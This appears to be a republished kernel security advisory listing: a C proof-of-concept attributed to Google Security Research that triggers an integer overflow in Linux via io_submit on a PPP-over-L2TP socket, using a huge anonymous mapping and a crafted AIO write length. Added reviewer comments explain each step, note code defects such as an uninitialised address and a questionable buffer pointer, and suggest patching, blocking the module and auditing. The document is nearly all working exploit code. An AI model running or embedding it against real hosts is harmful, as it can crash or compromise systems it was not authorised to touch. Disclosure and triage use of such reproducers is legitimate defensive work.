Linux io_submit L2TP Sendmsg Integer Overflow
来源:Google Security Research 作者:hawkes 发布时间:2016-02-25  

#include <stdio.h>
#include <string.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/if.h>
#include <linux/if_pppox.h>
#include <sys/mman.h>
#include <sys/syscall.h>
#include <linux/aio_abi.h>

/*
 * Reproducer for the issue named in the page title: an integer overflow
 * reached through io_submit() on a PPPoL2TP socket's sendmsg path.
 *
 * Sequence visible in this listing:
 *   1. open an AF_PPPOX / PX_PROTO_OL2TP datagram socket and connect() it;
 *   2. map and fill an anonymous region slightly larger than 4 GiB;
 *   3. create an AIO context and submit one IOCB_CMD_PWRITE request on the
 *      socket with aio_nbytes = 0xfffffe60.
 *
 * Returns 0 after submitting the request, -1 if any setup step fails.
 * argc/argv are unused.
 *
 * Reviewer notes (defensive):
 *   - The listing gives no affected kernel version or fix commit; confirm
 *     both against the original advisory before using this for triage.
 *   - The defect is in the kernel, so the remedy is a patched kernel. On
 *     hosts that do not need PPPoL2TP, keeping the l2tp_ppp module from
 *     loading should take this socket type out of reach -- verify on the
 *     target distribution.
 *   - An unprivileged process combining AF_PPPOX sockets with io_setup /
 *     io_submit is unusual enough to be worth an audit rule.
 */
int main(int argc, char *argv[]) {
 struct sockaddr_pppol2tp sax;
 /* NOTE(review): addr is never initialised anywhere in this listing. */
 struct sockaddr_in addr;
 int s, sfd, ret;
 struct iocb *iocbp;
 struct iocb iocb;
 aio_context_t ctx_id = 0;
 void *data;

 /* PPP-over-L2TP socket; fails if the protocol is unavailable on the host. */
 s = socket(AF_PPPOX, SOCK_DGRAM, PX_PROTO_OL2TP);

 if (s == -1) {
  perror("socket");
  return -1;
 }

 memset(&sax, 0, sizeof(struct sockaddr_pppol2tp));

 sax.sa_family = AF_PPPOX;
 sax.sa_protocol = PX_PROTO_OL2TP;

 /* No tunnel socket is supplied (fd = -1); tunnel ids are -1, session ids 0. */
 sax.pppol2tp.fd = -1;
 /* These two reads copy indeterminate values, because addr was never set. */
 sax.pppol2tp.addr.sin_addr.s_addr = addr.sin_addr.s_addr;
 sax.pppol2tp.addr.sin_port = addr.sin_port;
 sax.pppol2tp.addr.sin_family = AF_INET;
 sax.pppol2tp.s_tunnel  = -1;
 sax.pppol2tp.s_session = 0;
 sax.pppol2tp.d_tunnel  = -1;
 sax.pppol2tp.d_session = 0;

 /* Despite its name, sfd holds connect()'s status (0 or -1), not a descriptor. */
 sfd = connect(s, (struct sockaddr *)&sax, sizeof(sax));

 if (sfd == -1) {
  perror("connect");
  return -1;
 }

 /*
  * 0x100001000 bytes = 4 GiB + 4 KiB of private anonymous memory.
  * The length does not fit in 32 bits, so this presumably targets a
  * 64-bit build -- TODO confirm.
  */
 data = mmap(NULL, 0x100001000, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);

 if (data == MAP_FAILED) {
  perror("mmap");
  return -1;
 }

 /* Writes 0x41 across the whole mapping. */
 memset(data, 0x41, 0x100001000);

 /* Raw syscall: create an AIO context sized for 2 events. */
 ret = syscall(__NR_io_setup, 2, &ctx_id);

 if (ret == -1) {
  perror("io_setup");
  return -1;
 }

 memset(&iocb, 0, sizeof(struct iocb));

 /* One asynchronous write request against the L2TP socket. */
 iocb.aio_fildes = s;
 iocb.aio_lio_opcode = IOCB_CMD_PWRITE;
 /*
  * 0xfffffe60 is 0x1a0 (416) bytes short of 2^32. Presumably this is the
  * length whose handling overflows, as the title describes; the listing
  * itself does not show where.
  */
 iocb.aio_nbytes = 0xfffffe60;
 /*
  * NOTE(review): this stores the address of the local pointer variable
  * `data`, not the address of the mapping it points to. Confirm against
  * the original advisory whether that is intended.
  */
 iocb.aio_buf = (unsigned long) &data;

 iocbp = &iocb;

 /* The return value of io_submit is discarded, so a rejected request is silent. */
 syscall(__NR_io_submit, ctx_id, 1, &iocbp);

 return 0;
}


 